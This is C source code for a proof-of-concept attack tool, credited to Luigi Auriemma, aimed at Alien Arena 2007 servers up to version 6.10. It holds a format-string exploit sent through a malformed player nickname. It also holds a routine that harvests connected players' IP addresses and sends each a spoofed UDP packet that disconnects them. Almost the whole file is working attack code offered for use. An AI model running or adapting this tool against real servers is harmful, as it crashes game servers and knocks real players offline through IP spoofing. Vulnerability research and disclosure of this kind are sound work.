/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <stdarg.h>
#include <sys/stat.h>
#include <time.h>

#ifdef WIN32
    #include <winsock2.h>
    #include <ws2tcpip.h>
    #include "winerr.h"

    #define close       closesocket
    #define sleep       Sleep
    #define ONESEC      1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <sys/param.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define stricmp     strcasecmp
    #define strnicmp    strncasecmp
    #define stristr     strcasestr
    #define ONESEC      1
#endif

typedef uint8_t     u8;
typedef uint16_t    u16;
typedef uint32_t    u32;



#define VER         "0.1"
#define PORT        27910
#define BUFFSZ      2800        // max packet size in Alien Arena
#define MINPROTO    0
#define MAXPROTO    256
#define RELIABLE    0x80000000
#define MAX_OSPATH  128
#define Q2PCK       quake2_build_pck(0xffffffff, 0, 0, buff, BUFFSZ,
#define FUCK        "connect %d %hu %d "    \
                    "\""                    \
                    "\\spectator\\0"        \
                    "\\gender\\none"        \
                    "\\fov\\90"             \
                    "\\rate\\25000"         \
                    "\\msg\\0"              \
                    "\\skin\\%s"            \
                    "\\name\\%s"            \
                    "\\hand\\0"             \
                    "%s%s"                  \
                    "\" "                   \
                    "\n"



#include "udpspoof.h"
int disconnect_all(u32 srv_ip, u16 srv_port);
void fgetz(u8 *buff, int buffsz);
int quake2_chall(int sd, u8 *buff, int buffsz, struct sockaddr_in *peer);
int quake2_infoproto(int onlyinfo, struct sockaddr_in *peer);
int quake2_build_pck(u32 seq, u32 ack, u16 qport, u8 *buff, int size, u8 *fmt, ...);
int send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, struct sockaddr_in *peer, int err);
int rnds(u8 *data, int min, int len);
int gs_handle_info(u8 *data, int datalen, int nt, int chr, int front, int rear, ...);
int getxx(u8 *data, u32 *ret, int bits);
int putxx(u8 *data, u32 num, int bits);
int timeout(int sock, int secs);
u32 resolv(char *host);
void std_err(void);



u32     seed;
u8      *players_info   = NULL;



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer;
    int     sd,
            i,
            len,
            challenge,
            proto    = 0,
            attack;
    u16     port     = PORT,
            qport;
    u8      password[128],
            buff[BUFFSZ + 1],
            nick[17],
            *text,
            *skin    = "enforcer/default",
            *command = NULL;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "Alien Arena 2007 <= 6.10 format string and clients disconnection " VER "\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 3) {
        printf("\n"
            "Usage: %s <attack> <host> [port(%hu)]\n"
            "\n"
            "Attacks:\n"
            " 1 = in-game format string in safe_bprintf\n"
            "     this bug can be tested also setting the malformed nickname in the game\n"
            " 2 = clients disconnection through spoofed client_connect\n"
            "     the tool will automatically query the server and will collect the IP\n"
            "     addresses of the clients and then will send a specific spoofed UDP\n"
            "     packet to each one of them\n"
            "\n", argv[0], port);
        exit(1);
    }

    attack = atoi(argv[1]);

    if(argc > 3) port    = atoi(argv[3]);
    peer.sin_addr.s_addr = resolv(argv[2]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n",
        inet_ntoa(peer.sin_addr), port);

    seed      = time(NULL);
    qport     = ~seed;
    text      = buff + 4;
    *password = 0;

    proto = quake2_infoproto(0, &peer);
    printf("- use server protocol %d\n", proto);

    rnds(nick, 8, sizeof(nick));

    if(attack == 1) {
        strcpy(nick, "%01050x");
        command = "say boom";

    } else if(attack == 2) {
        if(!disconnect_all(peer.sin_addr.s_addr, port)) {
            printf("- no players to disconnect in the server\n");
        }
        return(0);
    }

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();

redo:
    printf("- start connection:\n");
    challenge = quake2_chall(sd, buff, BUFFSZ, &peer);

    len = Q2PCK
        FUCK,
        proto,
        ++qport,
        challenge,
        skin,
        nick,
        password[0] ? "\\password\\" : "", password);

    len = send_recv(sd, buff, len, buff, BUFFSZ, &peer, 1);

    if(strnicmp(text, "client_connect", 14)) {
        if(stristr(text, "full")) {
            printf("- server full\n");
            for(i = 5; i; i--) {
                printf("  %d\r", i);
                sleep(ONESEC);
            }
            goto redo;

        } else if(stristr(text, "password")) {
            printf("- server is protected, insert the password required:\n  ");
            fgetz(password, sizeof(password));
            goto redo;

        } else {
            printf(
                "- player has not been accepted with the following error:\n"
                "\n"
                "%s\n"
                "\n", text);
            exit(1);
        }
    }
    printf("    player \"%s\" connected\n", nick);

    if(command) {
        len = quake2_build_pck(
            1 | RELIABLE,
            0,
            qport,
            buff,
            BUFFSZ,
            command,
            NULL);      // the NULL here forces no format

        printf("    command: %s\n", buff + 11);

        len = send_recv(sd, buff, len, buff, BUFFSZ, &peer, 1);
    }

    close(sd);
    printf("- finished\n");
    return(0);
}



int disconnect_all(u32 srv_ip, u16 srv_port) {
    u32     ip;
    int     len,
            found;
    u16     port;
    u8      buff[BUFFSZ + 1],
            *p,
            *l,
            *s;

    found = 0;
    for(p = l = players_info; *p && l; p = l + 1) {
        l = strchr(p, '\n');
        if(l) *l = 0;

        s = strchr(p, ':');
        if(!s) continue;
        *s = 0;
        port = atoi(s + 1);

        s = strrchr(p, '\"');
        if(!s) continue;
        ip = inet_addr(s + 1);

        if((ip == INADDR_ANY) || (ip == INADDR_NONE) || (ip == inet_addr("127.0.0.1"))) continue;

        len = Q2PCK "client_connect");

        printf("- disconnect %s:%hu\n", inet_ntoa(*(struct in_addr *)&ip), port);
        if(udpspoof(srv_ip, htons(srv_port), ip, htons(port), buff, len) < 0) {
            printf("\nError: spoofing failed, are you root or admin? does your OS support RAW sockets?\n");
            exit(1);
        }

        sleep(0);   // not needed
        found++;
    }

    return(found);
}



void fgetz(u8 *buff, int buffsz) {
    u8      *p;

    fgets(buff, buffsz, stdin);
    for(p = buff; *p && (*p != '\n') && (*p != '\r'); p++);
    *p = 0;
}



int quake2_chall(int sd, u8 *buff, int buffsz, struct sockaddr_in *peer) {
    int     len,
            challenge;
    u8      *p,
            *text   = buff + 4;

    len = Q2PCK "getchallenge");
    len = send_recv(sd, buff, len, buff, buffsz, peer, 1);

    p = strchr(text, ' ');
    if(!p) {
        printf("\nError: no challenge key in the server's reply:\n%s\n\n", text);
        exit(1);
    }
    sscanf(p + 1, "%d", &challenge);
    printf("    challenge: %d\n", challenge);
    return(challenge);
}



int quake2_infoproto(int onlyinfo, struct sockaddr_in *peer) {
    int     sd,
            len,
            proto;
    u8      buff[BUFFSZ + 1],
            *text,
            *p,
            *protocol,
            *hostport;

    proto = 35;
    text  = buff + 4;

    printf("- request informations and retrieve server protocol:\n");
    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();

    len = Q2PCK "status");
    len = send_recv(sd, buff, len, buff, BUFFSZ, peer, 1);

    if(*buff == '\\') {
        printf("- the port you have specified seems a query port so I try to query it:\n");
        len = send_recv(sd, "\\status\\", 8, buff, BUFFSZ, peer, 1);

        gs_handle_info(buff, len, 1, '\\', 0, 0,
            "protocol", &protocol,
            "proto",    &protocol,
            "hostport", &hostport,
            NULL, NULL);

        if(hostport) printf("- relaunch this tool specifying the port %s\n\n", hostport);
        close(sd);
        exit(1);
    }

    gs_handle_info(buff, len, 1, '\\', 0, 0,
        "protocol", &protocol,
        "proto",    &protocol,
        "hostport", &hostport,
        NULL, NULL);

    if(onlyinfo) return(0);
    proto = atoi(protocol);

    if(proto < 0) {
        printf(
            "- no server protocol specified in the server's reply.\n"
            "  I try to retrieve it with a fast scanning\n");
        for(proto = MINPROTO; proto < MAXPROTO; proto++) {
            printf("- try protocol %d: ", proto);

            len = Q2PCK "info %d", proto);
            len = send_recv(sd, buff, len, buff, BUFFSZ, peer, 0);
            if(len < 0) {
                printf("- no reply from the server, I try to get protocol from challenge");
                len = Q2PCK "getchallenge");
                len = send_recv(sd, buff, len, buff, BUFFSZ, peer, 1);
                printf("  %s\n", text);

                p = strchr(text, '=');
                if(p) {
                    sscanf(p + 1, "%d", &proto);
                } else {
                    printf("- no protocol in the reply from the server\n");
                    proto = 35;
                }
                break;
            }

            if(!stristr(text, "wrong")) break;
            printf("%s\n", text);
        }
        if(proto == MAXPROTO) {
            printf("\nError: I have not been able to retrieve the server's protocol\n\n");
            exit(1);
        }
        fputc('\n', stdout);
    }

    close(sd);
    return(proto);
}



int quake2_build_pck(u32 seq, u32 ack, u16 qport, u8 *buff, int size, u8 *fmt, ...) {
    va_list ap;
    int     len;
    u8      *p;

    p = buff;
    p += putxx(p, seq, 32);
    if(seq != 0xffffffff) {
        p += putxx(p, ack,   32);
        p += putxx(p, qport, 16);
        p += putxx(p, 4,     8);
    }
    len = p - buff;

    va_start(ap, fmt);
    if(va_arg(ap, u8 *)) {
        va_end(ap);
        va_start(ap, fmt);
        len += vsprintf(p, fmt, ap);
    } else {
        len += sprintf(p, "%s", fmt);
    }
    va_end(ap);

    return(len + 1);
}



int send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, struct sockaddr_in *peer, int err) {
    int     retry,
            len;

    if(in && !out) {
        if(sendto(sd, in, insz, 0, (struct sockaddr *)peer, sizeof(struct sockaddr_in))
          < 0) std_err();
        return(0);
    }
    if(in) {
        for(retry = 3; retry; retry--) {
            if(sendto(sd, in, insz, 0, (struct sockaddr *)peer, sizeof(struct sockaddr_in))
              < 0) std_err();
            if(!timeout(sd, 1)) break;
        }

        if(!retry) {
            if(!err) return(-1);
            printf("\nError: socket timeout, no reply received\n\n");
            exit(1);
        }
    } else {
        if(timeout(sd, 3) < 0) return(-1);
    }

    len = recvfrom(sd, out, outsz, 0, NULL, NULL);
    if(len < 0) std_err();
    out[len] = 0;   // needed here
    return(len);
}



int rnds(u8 *data, int min, int len) {
    u8      *p;
    const static u8 table[] =
                "0123456789"
                "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
                "abcdefghijklmnopqrstuvwxyz";

    p   = data;
    len = seed % len;
    if(len < min) len = min;

    while(len--) {
        seed = (seed * 0x343FD) + 0x269EC3;
        *p++ = table[seed % (sizeof(table) - 1)];
    }
    *p++ = 0;

    return(p - data);
}



int gs_handle_info(u8 *data, int datalen, int nt, int chr, int front, int rear, ...) {
    va_list ap;
    int     i,
            args,
            found;
    u8      **parz,
            ***valz,
            *p,
            *limit,
            *par,
            *val,
            *players;

    va_start(ap, rear);
    for(i = 0; ; i++) {
        if(!va_arg(ap, u8 *))  break;
        if(!va_arg(ap, u8 **)) break;
    }
    va_end(ap);

    args = i;
    parz = malloc(args * sizeof(u8 *));
    valz = malloc(args * sizeof(u8 **));

    va_start(ap, rear);
    for(i = 0; i < args; i++) {
        parz[i]  = va_arg(ap, u8 *);
        valz[i]  = va_arg(ap, u8 **);
        *valz[i] = NULL;
    }
    va_end(ap);

    found   = 0;
    limit   = data + datalen - rear;
    *limit  = 0;
    data    += front;
    par     = NULL;
    val     = NULL;
    players = NULL;

    for(p = data; (data < limit) && p; data = p + 1, nt++) {
        p = strchr(data, chr);
        if(p) *p = 0;
        players = strchr(data, '\n');
        if(players) *players++ = 0;

        if(nt & 1) {
            if(!par) continue;
            val = data;
            printf("  %20s %s\n", par, val);

            for(i = 0; i < args; i++) {
                if(!stricmp(par, parz[i])) *valz[i] = val;
            }
        } else {
            par = data;
        }
    }

    if(players) {
        printf("  %20s\n%s\n", "players", players);
        players_info = strdup(players);
    }

    free(parz);
    free(valz);
    return(found);
}



int getxx(u8 *data, u32 *ret, int bits) {
    u32     num;
    int     i,
            bytes;

    bytes = bits >> 3;

    for(num = i = 0; i < bytes; i++) {
        num |= (data[i] << (i << 3));
    }

    *ret = num;
    return(bytes);
}



int putxx(u8 *data, u32 num, int bits) {
    int     i,
            bytes;

    bytes = bits >> 3;

    for(i = 0; i < bytes; i++) {
        data[i] = (num >> (i << 3)) & 0xff;
    }

    return(bytes);
}



int timeout(int sock, int secs) {
    struct  timeval tout;
    fd_set  fd_read;
    int     err;

    tout.tv_sec  = secs;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    err = select(sock + 1, &fd_read, NULL, NULL, &tout);
    if(err < 0) std_err();
    if(!err) return(-1);
    return(0);
}



u32 resolv(char *host) {
    struct  hostent *hp;
    u32     host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u32 *)(hp->h_addr);
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


